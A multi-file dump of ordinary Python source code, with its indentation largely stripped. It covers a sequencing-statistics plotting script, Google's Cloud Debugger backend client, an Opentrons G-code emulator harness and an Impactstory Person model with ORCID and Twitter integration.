unit=" Data-Sets",
)
)
)
if plot:
plot.parent.mkdir(parents=True, exist_ok=True)
get_path = partial(base_get_path, prefix=plot)
if mol_hist_data.shape[0] > 0:
def save_mol_plots(col, hue, n, typ):
name = get_path(f"molecular_length_{typ}s_{n}.png")
sb.relplot(
kind="line",
data=mol_hist_data,
col=col,
hue=hue,
x="Molecule Length",
y=typ,
).set(
xscale="log", yscale=("log" if typ == "PDF" else "linear")
).savefig(
name,
dpi=200,
bbox_inches="tight",
)
return name
generated.append(
(
save_mol_plots(col, hue, i + 1, typ)
for i, col, hue, typ in tqdm(
tuple(
(i, col, hue, typ)
for i, (col, hue) in enumerate(
(col, hue)
for colhue in (("Sample Name", "Min No. Reads"),)
for col, hue in (colhue, colhue[::-1])
)
for typ in ("PDF", "CDF")
),
desc="Saving Molecular Length Plots",
unit=" Plots",
)
)
)
if cov_hist_data.shape[0] > 0:
def save_cov_plots(typ):
name = get_path(f"coverage_gap_{typ}s.png")
sb.relplot(
kind="line",
data=cov_hist_data,
hue="Sample Name",
x="Coverage Gap Length",
y=typ,
).set(
xscale="log", yscale=("log" if typ == "PDF" else "linear")
).savefig(
name,
dpi=200,
bbox_inches="tight",
)
return name
generated.append(
(
save_cov_plots(typ)
for typ in tqdm(
("PDF", "CDF"),
desc="Saving Coverage Gap Plots",
unit=" Plots",
)
)
)
generated = tuple(("\t" + str(n)) for n in chain.from_iterable(generated))
LOGGER.info("")
LOGGER.info("Generated files:")
for line in generated:
LOGGER.info(line)
LOGGER.info("")
LOGGER.info("Done")
|
gcp_hub_client.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Communicates with Cloud Debugger backend over HTTP."""
from collections import deque
import copy
import hashlib
import inspect
import json
import logging
import os
import platform
import socket
import sys
import threading
import time
import traceback
import apiclient
import apiclient.discovery
import google_auth_httplib2
import httplib2
import six
import google.auth
from google.oauth2 import service_account
from . import backoff
from . import cdbg_native as native
from . import labels
from . import uniquifier_computer
from . import version
# This module catches all exceptions. This is safe because it runs in
# a daemon thread (so we are not blocking Ctrl+C). We need to catch all
# exceptions because the HTTP client is unpredictable with respect to
# which exceptions it can raise.
# pylint: disable=broad-except
# API scope we are requesting when service account authentication is enabled.
_CLOUD_PLATFORM_SCOPE = ['https://www.googleapis.com/auth/cloud-platform']
# Set of all known debuggee labels (passed down as flags). The value of
# a map is optional environment variable that can be used to set the flag
# (flags still take precedence).
_DEBUGGEE_LABELS = {
labels.Debuggee.MODULE: ['GAE_SERVICE', 'GAE_MODULE_NAME', 'K_SERVICE'],
labels.Debuggee.VERSION: [
'GAE_VERSION', 'GAE_MODULE_VERSION', 'K_REVISION'
],
labels.Debuggee.MINOR_VERSION: ['GAE_DEPLOYMENT_ID', 'GAE_MINOR_VERSION']
}
# Debuggee labels used to format debuggee description (ordered). The minor
# version is excluded for the sake of consistency with AppEngine UX.
_DESCRIPTION_LABELS = [
labels.Debuggee.PROJECT_ID, labels.Debuggee.MODULE, labels.Debuggee.VERSION
]
# HTTP timeout when accessing the cloud debugger API. It is selected to be
# longer than the typical controller.breakpoints.list hanging get latency
# of 40 seconds.
_HTTP_TIMEOUT_SECONDS = 100
class NoProjectIdError(Exception):
"""Used to indicate the project id cannot be determined."""
class GcpHubClient(object):
"""Controller API client.
Registers the debuggee, queries the active breakpoints and sends breakpoint
updates to the backend.
This class supports two types of authentication: application default
credentials or a manually provided JSON credentials file for a service
account.
GcpHubClient creates a worker thread that communicates with the backend. The
thread can be stopped with the Stop function, but this is optional since the
worker thread is marked as a daemon.
"""
def __init__(self):
self.on_active_breakpoints_changed = lambda x: None
self.on_idle = lambda: None
self._debuggee_labels = {}
self._service_account_auth = False
self._debuggee_id = None
self._wait_token = 'init'
self._breakpoints = []
self._main_thread = None
self._transmission_thread = None
self._transmission_thread_startup_lock = threading.Lock()
self._transmission_queue = deque(maxlen=100)
self._new_updates = threading.Event()
# Filter out excessive info-level logging triggered by the discovery API.
class _ChildLogFilter(logging.Filter):
"""Filter to eliminate info-level logging when called from this module."""
def __init__(self, filter_levels=None):
super(_ChildLogFilter, self).__init__()
        self._filter_levels = filter_levels or {logging.INFO}
# Get name without extension to avoid .py vs .pyc issues
self._my_filename = os.path.splitext(
inspect.getmodule(_ChildLogFilter).__file__)[0]
def filter(self, record):
if record.levelno not in self._filter_levels:
return True
callerframes = inspect.getouterframes(inspect.currentframe())
for f in callerframes:
if os.path.splitext(f[1])[0] == self._my_filename:
return False
return True
self._log_filter = _ChildLogFilter({logging.INFO})
apiclient.discovery.logger.addFilter(self._log_filter)
#
# Configuration options (constants only modified by unit test)
#
# Delay before retrying failed request.
self.register_backoff = backoff.Backoff() # Register debuggee.
self.list_backoff = backoff.Backoff() # Query active breakpoints.
self.update_backoff = backoff.Backoff() # Update breakpoint.
# Maximum number of times that the message is re-transmitted before it
# is assumed to be poisonous and discarded
self.max_transmit_attempts = 10
def InitializeDebuggeeLabels(self, flags):
"""Initialize debuggee labels from environment variables and flags.
The caller passes all the flags that the debuglet got. This function
will only use the flags used to label the debuggee. Flags take precedence
over environment variables.
Debuggee description is formatted from available flags.
Args:
flags: dictionary of debuglet command line flags.
"""
self._debuggee_labels = {}
for (label, var_names) in six.iteritems(_DEBUGGEE_LABELS):
# var_names is a list of possible environment variables that may contain
# the label value. Find the first one that is set.
for name in var_names:
value = os.environ.get(name)
if value:
# Special case for module. We omit the "default" module
# to stay consistent with AppEngine.
if label == labels.Debuggee.MODULE and value == 'default':
break
self._debuggee_labels[label] = value
break
if flags:
self._debuggee_labels.update(
{name: value for (name, value) in six.iteritems(flags)
if name in _DEBUGGEE_LABELS})
self._debuggee_labels['projectid'] = self._project_id
def SetupAuth(self,
project_id=None,
project_number=None,
service_account_json_file=None):
"""Sets up authentication with Google APIs.
This will use the credentials from service_account_json_file if provided,
falling back to application default credentials.
See https://cloud.google.com/docs/authentication/production.
Args:
project_id: GCP project ID (e.g. myproject). If not provided, will attempt
to retrieve it from the credentials.
project_number: GCP project number (e.g. 72386324623). If not provided,
project_id will be used in its place.
service_account_json_file: JSON file to use for credentials. If not
provided, will default to application default credentials.
Raises:
NoProjectIdError: If the project id cannot be determined.
"""
if service_account_json_file:
self._credentials = (
service_account.Credentials.from_service_account_file(
service_account_json_file, scopes=_CLOUD_PLATFORM_SCOPE))
if not project_id:
with open(service_account_json_file) as f:
project_id = json.load(f).get('project_id')
else:
self._credentials, credentials_project_id = google.auth.default(
scopes=_CLOUD_PLATFORM_SCOPE)
project_id = project_id or credentials_project_id
if not project_id:
raise NoProjectIdError(
'Unable to determine the project id from the API credentials. '
'Please specify the project id using the --project_id flag.')
self._project_id = project_id
self._project_number = project_number or project_id
def Start(self):
"""Starts the worker thread."""
self._shutdown = False
self._main_thread = threading.Thread(target=self._MainThreadProc)
self._main_thread.name = 'Cloud Debugger main worker thread'
self._main_thread.daemon = True
self._main_thread.start()
def Stop(self):
"""Signals the worker threads to shut down and waits until it exits."""
self._shutdown = True
self._new_updates.set() # Wake up the transmission thread.
if self._main_thread is not None:
self._main_thread.join()
self._main_thread = None
if self._transmission_thread is not None:
self._transmission_thread.join()
self._transmission_thread = None
def EnqueueBreakpointUpdate(self, breakpoint):
"""Asynchronously updates the specified breakpoint on the backend.
This function returns immediately. The worker thread is actually doing
    all the work. The worker thread is responsible for retrying the
    transmission in case of transient errors.
Args:
breakpoint: breakpoint in either final or non-final state.
"""
with self._transmission_thread_startup_lock:
if self._transmission_thread is None:
self._transmission_thread = threading.Thread(
target=self._TransmissionThreadProc)
self._transmission_thread.name = 'Cloud Debugger transmission thread'
self._transmission_thread.daemon = True
self._transmission_thread.start()
self._transmission_queue.append((breakpoint, 0))
self._new_updates.set() # Wake up the worker thread to send immediately.
def _BuildService(self):
http = httplib2.Http(timeout=_HTTP_TIMEOUT_SECONDS)
http = google_auth_httplib2.AuthorizedHttp(self._credentials, http)
api = apiclient.discovery.build(
'clouddebugger', 'v2', http=http, cache_discovery=False)
return api.controller()
def _MainThreadProc(self):
"""Entry point for the worker thread."""
registration_required = True
while not self._shutdown:
if registration_required:
service = self._BuildService()
registration_required, delay = self._RegisterDebuggee(service)
if not registration_required:
registration_required, delay = self._ListActiveBreakpoints(service)
if self.on_idle is not None:
self.on_idle()
if not self._shutdown:
time.sleep(delay)
def _TransmissionThreadProc(self):
"""Entry point for the transmission worker thread."""
reconnect = True
while not self._shutdown:
self._new_updates.clear()
if reconnect:
service = self._BuildService()
reconnect = False
reconnect, delay = self._TransmitBreakpointUpdates(service)
self._new_updates.wait(delay)
def _RegisterDebuggee(self, service):
"""Single attempt to register the debuggee.
If the registration succeeds, sets self._debuggee_id to the registered
debuggee ID.
Args:
service: client to use for API calls
Returns:
(registration_required, delay) tuple
"""
try:
request = {'debuggee': self._GetDebuggee()}
try:
response = service.debuggees().register(body=request).execute()
# self._project_number will refer to the project id on initialization if
# the project number is not available. The project field in the debuggee
# will always refer to the project number. Update so the server will not
# have to do id->number translations in the future.
project_number = response['debuggee'].get('project')
self._project_number = project_number or self._project_number
self._debuggee_id = response['debuggee']['id']
native.LogInfo('Debuggee registered successfully, ID: %s' % (
self._debuggee_id))
self.register_backoff.Succeeded()
return (False, 0) # Proceed immediately to list active breakpoints.
except BaseException:
native.LogInfo('Failed to register debuggee: %s, %s' %
(request, traceback.format_exc()))
except BaseException:
native.LogWarning('Debuggee information not available: ' +
traceback.format_exc())
return (True, self.register_backoff.Failed())
def _ListActiveBreakpoints(self, service):
"""Single attempt query the list of active breakpoints.
Must not be called before the debuggee has been registered. If the request
fails, this function resets self._debuggee_id, which triggers repeated
debuggee registration.
Args:
service: client to use for API calls
Returns:
(registration_required, delay) tuple
"""
try:
response = service.debuggees().breakpoints().list(
debuggeeId=self._debuggee_id, waitToken=self._wait_token,
successOnTimeout=True).execute()
if not response.get('waitExpired'):
self._wait_token = response.get('nextWaitToken')
breakpoints = response.get('breakpoints') or []
if self._breakpoints != breakpoints:
self._breakpoints = breakpoints
native.LogInfo(
'Breakpoints list changed, %d active, wait token: %s' % (
len(self._breakpoints), self._wait_token))
self.on_active_breakpoints_changed(copy.deepcopy(self._breakpoints))
except BaseException:
native.LogInfo('Failed to query active breakpoints: ' +
traceback.format_exc())
# Forget debuggee ID to trigger repeated debuggee registration. Once the
# registration succeeds, the worker thread will retry this query
self._debuggee_id = None
return (True, self.list_backoff.Failed())
self.list_backoff.Succeeded()
return (False, 0)
def _TransmitBreakpointUpdates(self, service):
"""Tries to send pending breakpoint updates to the backend.
Sends all the pending breakpoint updates. In case of transient failures,
the breakpoint is inserted back to the top of the queue. Application
failures are not retried (for example updating breakpoint in a final
state).
Each pending breakpoint maintains a retry counter. After repeated transient
failures the breakpoint is discarded and dropped from the queue.
Args:
service: client to use for API calls
Returns:
(reconnect, timeout) tuple. The first element ("reconnect") is set to
true on unexpected HTTP responses. The caller should discard the HTTP
connection and create a new one. The second element ("timeout") is
set to None if all pending breakpoints were sent successfully. Otherwise
returns time interval in seconds to stall before retrying.
"""
reconnect = False
retry_list = []
# There is only one consumer, so two step pop is safe.
while self._transmission_queue:
breakpoint, retry_count = self._transmission_queue.popleft()
try:
service.debuggees().breakpoints().update(
debuggeeId=self._debuggee_id, id=breakpoint['id'],
body={'breakpoint': breakpoint}).execute()
native.LogInfo('Breakpoint %s update transmitted successfully' % (
breakpoint['id']))
except apiclient.errors.HttpError as err:
        # Treat 4xx error codes (except 408 timeout) as application errors that
        # will not be retried. All other errors are assumed to be transient.
status = err.resp.status
is_transient = ((status >= 500) or (status == 408))
if is_transient:
if retry_count < self.max_transmit_attempts - 1:
native.LogInfo('Failed to send breakpoint %s update: %s' %
(breakpoint['id'], traceback.format_exc()))
retry_list.append((breakpoint, retry_count + 1))
else:
native.LogWarning('Breakpoint %s retry count exceeded maximum' %
breakpoint['id'])
else:
# This is very common if multiple instances are sending final update
# simultaneously.
native.LogInfo('%s, breakpoint: %s' % (err, breakpoint['id']))
except socket.error as err:
if retry_count < self.max_transmit_attempts - 1:
native.LogInfo(
'Socket error %d while sending breakpoint %s update: %s' %
(err.errno, breakpoint['id'], traceback.format_exc()))
retry_list.append((breakpoint, retry_count + 1))
else:
native.LogWarning('Breakpoint %s retry count exceeded maximum' %
breakpoint['id'])
# Socket errors shouldn't persist like this; reconnect.
reconnect = True
except BaseException:
native.LogWarning(
'Fatal error sending breakpoint %s update: %s' % (
breakpoint['id'], traceback.format_exc()))
reconnect = True
self._transmission_queue.extend(retry_list)
if not self._transmission_queue:
self.update_backoff.Succeeded()
# Nothing to send, wait until next breakpoint update.
return (reconnect, None)
else:
return (reconnect, self.update_backoff.Failed())
def _GetDebuggee(self):
"""Builds the debuggee structure."""
major_version = 'v' + version.__version__.split('.')[0]
python_version = ''.join(platform.python_version().split('.')[:2])
agent_version = ('google.com/python%s-gcp/%s' % (python_version,
major_version))
debuggee = {
'project': self._project_number,
'description': self._GetDebuggeeDescription(),
'labels': self._debuggee_labels,
'agentVersion': agent_version,
}
source_context = self._ReadAppJsonFile('source-context.json')
if source_context:
debuggee['sourceContexts'] = [source_context]
debuggee['uniquifier'] = self._ComputeUniquifier(debuggee)
return debuggee
def _GetDebuggeeDescription(self):
"""Formats debuggee description based on debuggee labels."""
return '-'.join(self._debuggee_labels[label]
for label in _DESCRIPTION_LABELS
if label in self._debuggee_labels)
def _ComputeUniquifier(self, debuggee):
"""Computes debuggee uniquifier.
The debuggee uniquifier has to be identical on all instances. Therefore the
uniquifier should not include any random numbers and should only be based
on inputs that are guaranteed to be the same on all instances.
Args:
debuggee: complete debuggee message without the uniquifier
Returns:
Hex string of SHA1 hash of project information, debuggee labels and
debuglet version.
"""
uniquifier = hashlib.sha1()
# Compute hash of application files if we don't have source context. This
# way we can still distinguish between different deployments.
if ('minorversion' not in debuggee.get('labels', []) and
'sourceContexts' not in debuggee):
uniquifier_computer.ComputeApplicationUniquifier(uniquifier)
return uniquifier.hexdigest()
def _ReadAppJsonFile(self, relative_path):
"""Reads JSON file from an application directory.
Args:
relative_path: file name relative to application root directory.
Returns:
Parsed JSON data or None if the file does not exist, can't be read or
not a valid JSON file.
"""
try:
with open(os.path.join(sys.path[0], relative_path), 'r') as f:
return json.load(f)
except (IOError, ValueError):
return None
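# A minimal usage sketch, assuming application default credentials are
# available; the project id, service name and version below are hypothetical
# placeholders. SetupAuth must run before InitializeDebuggeeLabels, since the
# latter records the project id resolved during auth setup.
def _example_run_hub_client():
  client = GcpHubClient()
  client.SetupAuth(project_id='my-project')
  client.InitializeDebuggeeLabels(
      {labels.Debuggee.MODULE: 'my-service', labels.Debuggee.VERSION: 'v1'})
  client.on_active_breakpoints_changed = (
      lambda breakpoints: native.LogInfo(
          '%d active breakpoints' % len(breakpoints)))
  client.Start()  # Spawns the daemon worker thread.
  # ... application code runs here ...
  client.Stop()  # Optional, since the worker thread is a daemon.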
|
g_code_engine.py
|
import os
import sys
import asyncio
import time
from multiprocessing import Process
from typing import Generator, Callable, Iterator
from collections import namedtuple
from opentrons.hardware_control.emulation.settings import Settings
from opentrons.hardware_control.emulation.types import ModuleType
from opentrons.protocols.parse import parse
from opentrons.protocols.execution import execute
from contextlib import contextmanager
from opentrons.protocol_api import ProtocolContext
from opentrons.config.robot_configs import build_config
from opentrons.hardware_control.emulation.module_server.helpers import (
wait_emulators,
ModuleStatusClient,
)
from opentrons.hardware_control.emulation.scripts import run_app
from opentrons.hardware_control import API, ThreadManager
from g_code_parsing.g_code_program.g_code_program import (
GCodeProgram,
)
from g_code_parsing.g_code_watcher import GCodeWatcher
from opentrons.protocols.context.protocol_api.protocol_context import (
ProtocolContextImplementation,
)
from g_code_parsing.utils import get_configuration_dir
Protocol = namedtuple("Protocol", ["text", "filename", "filelike"])
class GCodeEngine:
"""
Class for running a thing against the emulator.
See src/opentrons/hardware_control/emulation/settings.py for example explanation
of Smoothie configs
Add new run_* methods to class to support different inputs to the engine
Workflow is as follows:
1. Instantiate GCodeEngine
2. Call run_* method
3. Gather parsed data from returned GCodeProgram
"""
URI_TEMPLATE = "socket://127.0.0.1:%s"
def __init__(self, emulator_settings: Settings) -> None:
self._config = emulator_settings
@staticmethod
def _get_loop() -> asyncio.AbstractEventLoop:
"""Create an event loop"""
if sys.platform == "win32":
_loop = asyncio.ProactorEventLoop()
else:
_loop = asyncio.new_event_loop()
asyncio.set_event_loop(_loop)
return asyncio.get_event_loop()
@contextmanager
def _emulate(self) -> Iterator[ThreadManager]:
"""Context manager that starts emulated OT-2 hardware environment. A
hardware controller is returned."""
modules = [ModuleType.Magnetic, ModuleType.Temperature, ModuleType.Thermocycler]
# Entry point for the emulator app process
def _run_app():
asyncio.run(run_app.run(self._config, modules=[m.value for m in modules]))
proc = Process(target=_run_app)
proc.daemon = True
proc.start()
# Entry point for process that waits for emulation to be ready.
async def _wait_ready() -> None:
c = await ModuleStatusClient.connect(
host="localhost", port=self._config.module_server.port
)
await wait_emulators(client=c, modules=modules, timeout=5)
c.close()
def _run_wait_ready():
asyncio.run(_wait_ready())
ready_proc = Process(target=_run_wait_ready)
ready_proc.daemon = True
ready_proc.start()
ready_proc.join()
# Hardware controller
conf = build_config({})
emulator = ThreadManager(
API.build_hardware_controller,
conf,
GCodeEngine.URI_TEMPLATE % self._config.smoothie.port,
)
# Wait for modules to be present
while len(emulator.attached_modules) != len(modules):
time.sleep(0.1)
yield emulator
# Finished. Stop the emulator
proc.kill()
proc.join()
@staticmethod
def _get_protocol(file_path: str) -> Protocol:
with open(file_path) as file:
text = "".join(list(file))
file.seek(0)
return Protocol(text=text, filename=file_path, filelike=file)
@contextmanager
def run_protocol(self, path: str) -> Generator:
"""
        Runs the passed protocol file and collects all G-Code I/O from it.
        Cleans up the emulation after execution.
:param path: Path to file
:return: GCodeProgram with all the parsed data
"""
file_path = os.path.join(get_configuration_dir(), path)
with self._emulate() as h:
protocol = self._get_protocol(file_path)
context = ProtocolContext(
implementation=ProtocolContextImplementation(hardware=h),
loop=self._get_loop(),
)
parsed_protocol = parse(protocol.text, protocol.filename)
with GCodeWatcher(emulator_settings=self._config) as watcher:
execute.run_protocol(parsed_protocol, context=context)
yield GCodeProgram.from_g_code_watcher(watcher)
@contextmanager
def run_http(self, executable: Callable):
"""
        Runs an HTTP request and collects all G-Code I/O from it.
        :param executable: Function connected to the HTTP request to execute
        :return: GCodeProgram with all the parsed data
"""
with self._emulate() as h:
with GCodeWatcher(emulator_settings=self._config) as watcher:
asyncio.run(executable(hardware=h))
yield GCodeProgram.from_g_code_watcher(watcher)
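# A minimal usage sketch, assuming default emulator Settings and a protocol
# file located under the directory returned by get_configuration_dir(); the
# protocol path below is a hypothetical placeholder.
def _example_run_protocol() -> None:
    engine = GCodeEngine(emulator_settings=Settings())
    with engine.run_protocol("protocols/example_protocol.py") as program:
        # program is a GCodeProgram built from the G-Code captured by GCodeWatcher
        print(program)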
|
person.py
|
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import deferred
from sqlalchemy import orm
from sqlalchemy import text
from sqlalchemy import func
from app import db
from models import product # needed for sqla i think
from models import badge # needed for sqla i think
from models.product import make_product
from models.product import distinct_product_list
from models.orcid import OrcidProfile
from models.orcid import clean_orcid
from models.orcid import NoOrcidException
from models.orcid import OrcidDoesNotExist
from models.badge import Badge
from models.orcid import make_and_populate_orcid_profile
from models.source import sources_metadata
from models.source import Source
from models.refset import Refset
from models.emailer import send
from models.log_email import save_email
from models.log_openness import save_openness_log
from util import elapsed
from util import chunks
from util import date_as_iso_utc
from util import days_ago
from util import safe_commit
from util import calculate_percentile
from util import as_proportion
from time import time
from time import sleep
from copy import deepcopy
import jwt
import os
import shortuuid
import requests
import json
import re
import datetime
import logging
import operator
import threading
import hashlib
import math
from nameparser import HumanName
from collections import defaultdict
from requests_oauthlib import OAuth1Session
from util import update_recursive_sum
class PersonExistsException(Exception):
pass
def get_random_people(n, refset_only=False):
# this simpler way didn't work: func.setseed(0.42)
# below way is from https://github.com/khanduri/khanduri.github.io/blob/master/_posts/2016-02-26-fetch-rows-in-random-order-with-seed-support.md
sql = text('select setseed({0});'.format(0.42))
db.engine.execute(sql)
q = Person.query
if refset_only:
q = q.filter(Person.campaign == "2015_with_urls")
q = q.order_by(func.random())
q = q.limit(n)
people = q.all()
return people
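# Usage note (illustrative): the setseed(0.42) call above seeds Postgres
# random(), so the "random" ordering is repeatable across runs, e.g.
#   refset_sample = get_random_people(100, refset_only=True)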
def delete_person(orcid_id):
# also need delete all the badges, products
product.Product.query.filter_by(orcid_id=orcid_id).delete()
badge.Badge.query.filter_by(orcid_id=orcid_id).delete()
# and now delete the person. have to do this after deleting the stuff above.
Person.query.filter_by(orcid_id=orcid_id).delete()
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(orcid_id)
def set_person_email(orcid_id, email, high_priority=False):
my_person = Person.query.filter_by(orcid_id=orcid_id).first()
my_person.email = email
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(orcid_id)
def update_person(my_person, properties_to_change):
for k, v in properties_to_change.iteritems():
setattr(my_person, k, v)
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
# we should abstract this so it can work with any jsonb person column
def update_promos(my_person, new_promos):
# note this does not overwrite anything unless you do it on purpose;
# if you don't give it the key, it ignores it.
for k, v in new_promos.iteritems():
my_person.promos[k] = v
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
def set_person_claimed_at(my_person):
my_person.claimed_at = datetime.datetime.utcnow().isoformat()
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
def get_full_twitter_profile(twitter_creds):
oauth = OAuth1Session(
os.getenv('TWITTER_CONSUMER_KEY'),
client_secret=os.getenv('TWITTER_CONSUMER_SECRET'),
resource_owner_key=twitter_creds["oauth_token"],
resource_owner_secret=twitter_creds["oauth_token_secret"]
)
url = "https://api.twitter.com/1.1/account/verify_credentials.json?include_email=true"
r = oauth.get(url)
full_twitter_profile = r.json()
return full_twitter_profile
def make_temporary_person_from_orcid(orcid_id):
my_person = Person()
my_person.id = "u_is{}".format(shortuuid.uuid()[0:5])
my_person.created = datetime.datetime.utcnow()
print u"starting make_temporary_person_from_orcid: made new person for {}".format(my_person)
my_person.orcid_id = orcid_id
my_person.refresh()
print u"finished make_temporary_person_from_orcid: made new person for {}".format(my_person)
return my_person
def make_person(twitter_creds, high_priority=False, landing_page=None):
if Person.query.filter_by(twitter=twitter_creds["screen_name"]).first():
raise PersonExistsException
my_person = Person()
my_person.id = "u_is{}".format(shortuuid.uuid()[0:5])
my_person.created = datetime.datetime.utcnow()
my_person.claimed_at = datetime.datetime.utcnow().isoformat()
my_person.landing_page = landing_page
print u"\nin make_person: made new person for {}".format(my_person)
return connect_twitter(my_person, twitter_creds, set_everything_possible=True)
def connect_orcid(my_person, orcid_id):
print u"adding a brand new orcid_id for {}: {}".format(my_person.full_name, orcid_id)
my_person.orcid_id = orcid_id
# save it here, so we've got their orcid
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
# then keep going!
return refresh_orcid_info_and_save(my_person)
def disconnect_twitter(my_person):
my_person.twitter_creds = None
my_person.twitter = None
print u"\nDisconnected Twitter from: {}".format(my_person)
db.session.add(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
return my_person
def connect_twitter(my_person, twitter_creds, set_everything_possible=False):
full_twitter_profile = get_full_twitter_profile(twitter_creds)
full_twitter_profile.update(twitter_creds)
my_person.twitter_creds = full_twitter_profile
my_person.twitter = full_twitter_profile["screen_name"]
if set_everything_possible:
my_person.email = full_twitter_profile["email"]
twitter_full_name = full_twitter_profile["name"]
try:
parsed_name = HumanName(twitter_full_name)
my_person.family_name = parsed_name["last"]
my_person.given_names = parsed_name["first"]
if my_person.given_names and len(my_person.given_names) <= 2 and parsed_name["middle"]:
my_person.given_names = parsed_name["middle"]
except KeyError:
            my_person.given_names = twitter_full_name  # first_name is a read-only property
print u"\nAdded Twitter info to person: {}".format(my_person)
db.session.add(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.id)
return my_person
def refresh_orcid_info_and_save(my_person):
print u"refreshing all orcid info for {}".format(my_person.orcid_id)
my_person.refresh_orcid_info()
print u"storing refreshed person in db"
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
# this should be refactored with refresh_profile(). doing it this way is dumb.
def refresh_person(my_person, high_priority=False):
print u"refreshing {}".format(my_person.orcid_id)
# for testing on jason's local, so it doesn't have to do a real refresh
# sleep(5)
# return my_person
my_person.refresh(high_priority=high_priority)
db.session.merge(my_person)
commit_success = safe_commit(db)
if not commit_success:
print u"COMMIT fail on {}".format(my_person.orcid_id)
return my_person
def refresh_profile(orcid_id, high_priority=False):
print u"refreshing {}".format(orcid_id)
my_person = Person.query.options(orm.undefer('*')).filter_by(orcid_id=orcid_id).first()
# for testing on jason's local, so it doesn't have to do a real refresh
# sleep(5)
# return my_person
my_person.refresh(high_priority=high_priority)
db.session.merge(my_person)
commit_success = safe_commit(db)
if commit_success:
print u"committed {}".format(orcid_id)
else:
print u"COMMIT fail on {}".format(orcid_id)
return my_person
def top_acheivement_persons(persons, achievements, limit):
top_persons = (
Person.query.
join(Person.badges).
filter(Person.orcid_id.in_(persons), Badge.name.in_(achievements)).
# group_by(Person.id).
# order_by(func.sum(Badge.percentile).desc()).
order_by(Badge.percentile.desc()).
limit(limit).
all()
)
    # if the number of persons with the provided achievements is less than the limit, add more persons
new_limit = limit - len(top_persons)
if new_limit:
top_persons_ids = [person.orcid_id for person in top_persons]
top_persons.extend(Person.query.filter(~Person.orcid_id.in_(top_persons_ids), Person.orcid_id.in_(persons)).
limit(new_limit).
all())
return top_persons
def avg_openess(persons):
openness = Person.query.filter(Person.orcid_id.in_(persons)).with_entities(func.avg(Person.openness)).scalar()
return openness
def get_sources(products):
sources = []
for source_name in sources_metadata:
source = Source(source_name, products)
if source.posts_count > 0:
sources.append(source)
return sources
class Person(db.Model):
id = db.Column(db.Text, primary_key=True)
orcid_id = db.Column(db.Text, unique=True)
given_names = db.Column(db.Text)
family_name = db.Column(db.Text)
created = db.Column(db.DateTime)
updated = db.Column(db.DateTime)
claimed_at = db.Column(db.DateTime)
orcid_api_raw_json = deferred(db.Column(JSONB))
fresh_orcid = db.Column(db.Boolean)
invalid_orcid = db.Column(db.Boolean)
email = db.Column(db.Text)
twitter = db.Column(db.Text)
twitter_creds = db.Column(MutableDict.as_mutable(JSONB))
campaign = db.Column(db.Text)
landing_page = db.Column(db.Text)
depsy_id = db.Column(db.Text)
depsy_percentile = db.Column(db.Float)
affiliation_name = db.Column(db.Text)
affiliation_role_title = db.Column(db.Text)
post_counts = db.Column(MutableDict.as_mutable(JSONB))
mendeley_sums = db.Column(MutableDict.as_mutable(JSONB)) # not deferred for now
num_products = db.Column(db.Integer)
num_posts = db.Column(db.Integer)
num_mentions = db.Column(db.Integer)
num_badges = db.Column(db.Integer)
openness = db.Column(db.Float)
events_emailed = db.Column(MutableDict.as_mutable(JSONB))
weekly_event_count = db.Column(db.Float)
monthly_event_count = db.Column(db.Float)
tweeted_quickly = db.Column(db.Boolean)
finished_wizard = db.Column(db.Boolean)
saw_opencon_landing_page = db.Column(db.Boolean)
num_fulltext = db.Column(db.Integer)
num_user_supplied_fulltext = db.Column(db.Integer)
num_any_oa = db.Column(db.Integer)
num_cc_by = db.Column(db.Integer)
num_cc_restricted = db.Column(db.Integer)
num_cc0_pd = db.Column(db.Integer)
coauthors = db.Column(MutableDict.as_mutable(JSONB))
promos = db.Column(MutableDict.as_mutable(JSONB))
error = db.Column(db.Text)
products = db.relationship(
'Product',
lazy='subquery',
cascade="all, delete-orphan",
backref=db.backref("person", lazy="subquery"),
foreign_keys="Product.orcid_id"
)
badges = db.relationship(
'Badge',
lazy='subquery',
cascade="all, delete-orphan",
backref=db.backref("person", lazy="subquery"),
foreign_keys="Badge.orcid_id"
)
def __init__(self):
self.invalid_orcid = False
@property
def impactstory_url(self):
if self.orcid_id:
return u"https://impactstory.org/u/{}".format(self.orcid_id)
else:
return None
# doesn't have error handling; called by refresh when you want it to be robust
def call_apis(self, high_priority=False, overwrite_orcid=True, overwrite_metrics=True):
        # parse orcid so we know what to gather
start_time = time()
print u"** calling set_api_raw_from_orcid"
if overwrite_orcid or not self.orcid_api_raw_json:
self.set_api_raw_from_orcid()
else:
print u"not calling orcid because no overwrite"
print u"elapsed in call_apis after set_api_raw_from_orcid is {}s".format(elapsed(start_time, 2))
self.set_from_orcid()
print u"set_from_orcid took {}s".format(elapsed(start_time, 2))
print u"elapsed in call_apis after set_from_orcid is {}s".format(elapsed(start_time, 2))
products_without_dois = [p for p in self.products if not p.doi]
if products_without_dois:
print u"** calling set_data_for_all_products for crossref doi lookup"
# do this first, so have doi for everything else
self.set_data_for_all_products("set_doi_from_crossref_biblio_lookup", high_priority)
else:
print u"** all products have dois data, so not calling crossref to look for dois"
